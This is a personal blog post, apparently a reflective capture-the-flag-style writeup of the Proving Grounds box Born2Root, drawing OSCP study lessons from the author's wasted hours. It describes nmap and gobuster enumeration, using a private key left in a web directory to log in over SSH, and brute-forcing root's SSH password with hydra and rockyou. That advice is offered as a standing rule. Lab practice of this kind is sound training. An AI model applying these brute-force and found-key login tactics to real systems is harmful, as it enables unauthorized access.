Breaking the HTB Habits and building better OSCP ones…
Born2Root pseudo writeup.
As a quick reminder — Just took the OSCP and failed. I learned that the OSCP is not HackTheBox. If you want to read about the lessons learned. Go to that link. It really outlines the different mentality and methodology you need specifically for the OSCP.
So while this is kind of a box writeup, it’s more so a discussion on bad habits learned from HTB and how it affects OSCP-like box hacking. I don’t walk through the correct steps for this box, I walk through the actual steps I took and then review where I messed up. Hopefully this will help someone else who crushes HTB machines but struggles with OSCP. Let’s go…
Before getting into the box let’s do a quick rundown on what we learned by failing the OSCP. Bullet point summary here we go!
- Not every vulnerability/CVE/Exploit is the way in.
- Making some progress on some particular application or port is not always a clue that you’re going the right direction to get in.
- Enumerate harder than you exploit.
- Try Harder? no. Try something else.
So if HTB was building bad habits, it’s time to pack our bags and move to a new home. And the closest thing to the OSCP I could imagine would be Offensive Security’s other little goodie — Proving Grounds.
Paid for the Practice as well as the play because 3 hours ain’t enough. Went straight to Play — Got to work and started looking around for a good Intermediate 8 pointer. There is nothing that says these box points are gauged the same way the actual OSCP boxes are, but I’d like to pretend. If I’m getting into 20 and 25 pointers at Proving Grounds, I have to image I’m pretty close to where I need to be. But for now, let’s try a little taste of what Proving Grounds has to offer with a little baby 8.
Now a little spoiler, despite knowing where I went wrong on the OSCP I still ended up sticking to my guns. This machine should have taken a quick nmap, visit the site, run some things in the background, get a cup of coffee. Root. But instead I HTB’d the heck out of this for 4 hours. Here we go.
So I’m typically a nmap -sV -sC -A kind of guy. But I wanted to start learning AutoRecon after hearing so many good things about it. So we fired that off and got loads of results back.
From this I’ll give you the summary. I cut out all the junk and just pasted what matters below.
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))
|_http-title: Secretsec Company
|_http-server-header: Apache/2.4.10 (Debian)
| /robots.txt: Robots file
| /files/: Potentially interesting directory w/ listing on
| http-robots.txt: 2 disallowed entries
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| (1) http://192.168.200.49:80/:
| (1) email:
|_ + email@example.com
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
44532/tcp open status syn-ack 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From all of these I know that I can do loads of enumeration on 80, maybe something with the RPC, and I have nothing for 44532. Let’s knock out 44532 real quick.
I do a google search and I don’t find anything useful on what that port might be.
So I do a quick nc.
Cool. Didn’t want to talk to you either. Let’s go back to dig into port 80.
Just from the nmap we know a few things.
- /Files directory exists
- so does /wordpress-blog (but no /wp-admin ?)
- Apache 2.4.10
- and SecretSec Company.
Let’s take a look at the site.
Okay cool. I see martin’s email again. And three new names of employees and possible users later down the road. Cool. Also good job editing the Apache default page guy. Good work.
Let’s take a look at the /wordpress-blog page real quick.
Ha. Jerk. You’re sooo getting hacked.
Note: I did in fact try a WPScan a couple times just in case. Of course nothing.
What about /Files?
Okay. Not a lot going on here. What about GoBuster Directory discovery?
Cool sweet, we got some 301s. Manual looks interesting. So does /server-status but it’s a 403. /icons are always there and default to the installation. So let’s take a peek at Manual.
Okay okay okay. I know this. If you have a default Apache server running, then you might have the default page with the manual links in all the languages. This isn’t going to do anything for us. This just leads us to the Apache manuals page in various languages.
Watch as I dive deeper and deeper into a hole
What about source code? Nothing fancy but there was a comment block that had a setup of divs for navigation. In that it had some pages I had yet to see.
- Config Files
Of course I tried manually checking these out but I didn’t find anything gobuster didn’t already know.
Next I go ahead and check Apache out. I do a quick google and a searchsploit
I’m going to save you the headache of talking through trying about 3 of those out. Matter of fact. This is a good time to pause.
I had already made a few pretty big mistakes.
First off, if you’ve done this box before you caught it. That part earlier where I found the /icons directory and just “oh it’s nothing there, that is default”. Yep. That was a mistake. Also, I have a handful of possible usernames, why didn’t I go ahead and just fire off some hyrda against ssh using those names and rockyou? Wouldn’t hurt to get that going. Matter of fact, I think as a rule moving forward, I will always get hyrda going against root on ssh if it’s available. Who knows. You might get root on a box in your sleep. That would be the case for this box if it was on the test at least.
So here I am, thinking I’ve done all I can. This was the exact feeling I had on the OSCP.
I enumerated RPC and kept trying different exploits against Apache. I’ve done “the easy stuff” and was going for “try harder”. Maybe even kernel level stuff on this one? But then it hit me. I was following my bad habits again and I started from the top. Looked at nmap and looked at gobuster. And there I saw it. I hadn’t looked at /icons. So let’s take a look.
Loollll. There sits a text file in the icons directory. Just a little ole text file. Three hours in and it was something I could have seen within the first 30 minutes. Well. What’s in it you say? Lol well.
A private key. Literally not even hacking at this point. Just using the keys that are laying around. As you can see I downloaded it, copied it over and named it id_rsa. We have a few names that could be usernames, but the one that stands out was martin. So let’s try him first.
Man do I feel dumb. I was pulling out the big guns and this wasn’t even a fight. Not to mention he had some secret password function that was broken. If you’re curious I just left it blank and got in. So. That’s user level access gained.
Now I won’t go through all the details of the next 2 hours of Priv Esc. Because it was pointless. Good practice, but doesn’t get you closer to root.
Quick Summary and a Big Lesson
Tired of looking through files and privesc script output, I fired a hail mary while I went and made a bagel. The hail mary? A brute force against root on SSH. Andd that was it. I was infuriated. I could have done that first thing and skipped everything else. I doubt this sort of thing would be the case on the OSCP, but this sort of run-around drown in vulnerabilities and exploits…
but the answer being right in front of you? Yeah that OSCP’s calling card.
Looking back I now know that this habit is going to be a tough one to break. Enumerate everything you can when you see it, easiest to hardest. Don’t skip easy things just because you think it’s probably xyz. Just take a look. It takes seconds. And always try to brute force root. It’s dumb to skip it. And the moment you get other usernames? Brute those too.
I’m going to keep learning these lessons over and over until it sticks. And until then I’ll keep writing about how I’m messing up so you guys won’t have to. If you have any comments or questions about this feel free to reach out. I’m going to do a few more boxes today and try not to repeat the same mistakes. I’ll let you know how it goes! Thanks friendos.
@MehhSecurity on Twitter